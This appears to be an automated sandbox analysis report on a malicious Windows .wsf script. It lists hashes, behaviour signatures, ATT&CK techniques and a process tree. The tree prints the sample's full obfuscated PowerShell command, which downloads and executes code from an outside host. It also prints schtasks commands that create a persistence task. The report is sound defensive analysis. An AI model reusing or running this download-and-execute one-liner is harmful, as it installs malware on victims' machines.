0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19-09-2024 06:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64.wsf
Size

6KB
MD5

26b251a59dc03f6ce1503678d0dddfd2
SHA1

cfa1814660079da10073d0e78d3277f83c40d3fc
SHA256

0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64
SHA512

d68634da8b45ca9457364ac6e67e79f6fa689e08ddc4fae443c08f8af563728fff25128bae6f49348ce2c4d4aab78727248bdace6e5f1e994d7f8dfba44808c0
SSDEEP

96:ur2TPTPXoPlhotyH9/qLr2TPTPXoPlhotyH9/qo:u6csYH9/qL6csYH9/qo

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1320	WScript.exe
6	2936	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2936	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2540	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2936	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1320 wrote to memory of 2936	1320	WScript.exe	30
PID 1320 wrote to memory of 2936	1320	WScript.exe	30
PID 1320 wrote to memory of 2936	1320	WScript.exe	30
PID 2936 wrote to memory of 2540	2936	powershell.exe	32
PID 2936 wrote to memory of 2540	2936	powershell.exe	32
PID 2936 wrote to memory of 2540	2936	powershell.exe	32
PID 2936 wrote to memory of 2576	2936	powershell.exe	33
PID 2936 wrote to memory of 2576	2936	powershell.exe	33
PID 2936 wrote to memory of 2576	2936	powershell.exe	33

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0269a17c1d15a00cda8161abdccc96ac446dd15379b0828463093fe4c40afc64.wsf"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://workingzoon.work.gd:777/ft7/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2540
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
    3⤵
    PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml

Filesize
1KB

MD5
26913303151afee791eb652db6764fe2

SHA1
49418253140caeacb2a1b5bfac48f4bc8e8d5b24

SHA256
14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248

SHA512
5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141

Download Submit
memory/2936-7-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

Filesize
4KB

Download
memory/2936-8-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2936-9-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2936-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2936-15-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download
memory/2936-16-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

Filesize
4KB

Download
memory/2936-17-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Filesize
9.6MB

Download